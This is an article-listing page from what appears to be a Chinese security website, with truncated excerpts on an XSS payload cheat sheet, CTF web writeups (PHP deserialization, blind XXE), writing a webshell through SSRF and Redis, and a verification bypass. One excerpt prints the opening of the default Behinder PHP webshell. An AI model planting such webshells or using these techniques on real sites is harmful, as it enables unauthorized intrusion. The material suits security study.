文章列表
美特勤局证实有海外黑客团队骗取失业救助金 已损失数亿美元
新冠疫情期间,美国各州发放了失业救助金。不过根据美国特勤局(U.S. Secret Service)最新发布的警告,有海外诈骗团伙利用此前窃取的身份资料申请救助金,导致数百万美元的资金外流。援引《纽约时报》本周六报道,美国特勤局认为有一伙来自尼日利亚的犯罪分子利用此前从网络攻击中窃取的个人信息,可能
xss漏洞模糊测试payload的最佳集合 2020版
# XSS_Cheat_Sheet_2020_Edition## 简介白帽赏金平台xss漏洞模糊测试有效载荷的最佳集合 2020版 <br>该备忘清单可用于漏洞猎人,安全分析,渗透测试人员,根据应用的实际情况,测试不同的payload,并观察响应内容,查找web应用的跨站点脚本漏洞,共计100+条xss漏洞测试小技巧 <br>本备忘录翻译自国外的`
美国黑客要偷咱的疫苗,证据信号已经曝出!
美国黑客要偷咱的疫苗,证据信号已经曝出!“美国即将发布警告,指控中国试图窃取新冠疫苗研究成果。”北京时间今天早晨,美国几家主要媒体不约而同地将这个消息放上网站首页,并称这与美国政府“将疫情暴发归咎于中国的其他指控保持一致。”它们也意识到,华盛顿正绞尽脑汁,寻找新的对华攻击点。01纽
Facebook SDK 问题导致部分 iOS 应用崩溃 Spotify、TikTok 均受影响
在一些苹果设备论坛上有多个关于iOS设备上的应用不断出现崩溃的投诉,各种应用似乎都受到了影响,专门用于监测网络服务健康程度的Downdetector仪表盘上更是出现了罕见的全员故障情景。例如,谷歌的Waze应用无法启动,还有包括Pinterest、Spotify、Adobe Spark、Quora、TikTok等在内的各种常用应用的问
2020-网鼎杯(青龙组)_Web题目 AreUserialz Writeup
## 0x02 AreUSerialz **关于s大写小写问题,可以看p神在圈子里发的,我在最后付上截图****考点: php反序列化 php特性 利用链构造 ****1.打开页面得到代码如下:**```php<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $
2020-网鼎杯(青龙组)_Web题目 FileJava Writeup
## 0x01 Web题目: filejava **考点: 任意文件读取 代码审计 java组件漏洞利用 盲XXE****1.随意上传文件,试了试 jsp. 可以上传,返回下载地址,有filename参数,fuzz一下,发现有任意文件读取****2.试着fuzz读flag,没有结果,读了下web.xml,那就把源码down下来,审计一下****通过一个小工具,把源码down下:***
通过 SSRF 操作 Redis 主从复制写 Webshell
十篇想看的文章中就有八篇是这样的。 真鸡儿烦人,连续签到了差不多一年还是这样,没办法只能先水上去了。自己转载自己公开的文章应该不会被 ban 吧?Author : R3start and 曲云杰2020年4月1日19:57:37废话说起来很巧,这篇文章早就写完了,当时写完的时候并没有发出去,因为本想着等曲老板的其他东
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远下面这个是默认的冰蝎马:<?php@error_reporting(0);session_start();if (isset($_GET)){ $key=substr(md5(uniqid(rand())),16); $_SESSION=$key; print $key;}else{ $key=$_SESSION;$post=file_get_contents("php://input").'';if(!exten
腾讯(qq.com)某分站绑定手机验证绕过
腾讯(qq.com)某分站绑定手机验证绕过
